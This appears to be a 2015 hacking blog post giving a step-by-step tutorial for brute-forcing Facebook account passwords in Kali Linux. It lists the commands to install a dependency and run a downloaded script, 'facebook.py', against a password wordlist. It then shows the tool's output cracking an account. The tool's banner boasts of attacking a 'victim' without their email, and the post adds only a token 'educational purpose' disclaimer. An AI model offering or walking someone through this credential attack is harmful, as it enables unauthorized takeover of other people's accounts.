:::: MENU ::::

Tuesday 8 December 2015

How to Brute Force hacking Facebook in Kali Linux

We need a tool:

1. Python Script - facebook.py
2. Wordlist - e.g. pass.txt or wordlist.txt

I have already installed python or Install python after installing

step 1.

[*] root@lhackg:~#apt-get install python-mechanize

step 2.

now downloading facebook.py

[*] root@lhackg~# chmod +x facebook.py
[*] root@lhackg:~# python facebook.py

Note: - This tool can crack facebook account even if you don't have the email of your victim
# Hit CTRL+C to quit the program
# Use www.graph.facebook.com for more infos about your victim ^_^
# Enter |Email| |Phone number| |Profile ID number| |Username| : lhackg.lhackg  <<my facebook username
[*] Enter the name of the password list file :/root/Desktop/pass.txt << my wordlist localate
        | . . . . . . . . . . . . . Facebook Cracker v 2 . . . . . . . . . . . .  . |
        |#Author: Mauritania Attacker                                             |
        |#Contact: www.fb.com/mauritanie.forever                          |
        |#Date: 02/04/2013                                                            |
        |#This tool is made for pentesting.                                        |
        |#Changing the Description of this tool                                 |
        |Won't made you the coder ^_^ !!!                                     |
        |#Respect Coderz ^_^                                                        |
        |#I take no responsibilities for the                                        |
        |  use of this program !                                                        |
        | . . . . . . . . . . . . . . Facebook Cracker v 2 . . . . . . . . . . . . . |

 [*] Account to crack : lhackg.lhackg
 [*] Loaded : 17 passwords
 [*] Cracking, please wait ...
 [*] trying blogspot..

 [*] Password found .. !!

 [*] Password : blogspot

heppy done!

Note ::This is for Educational Purpose Only...I am not responsible for any thing you do...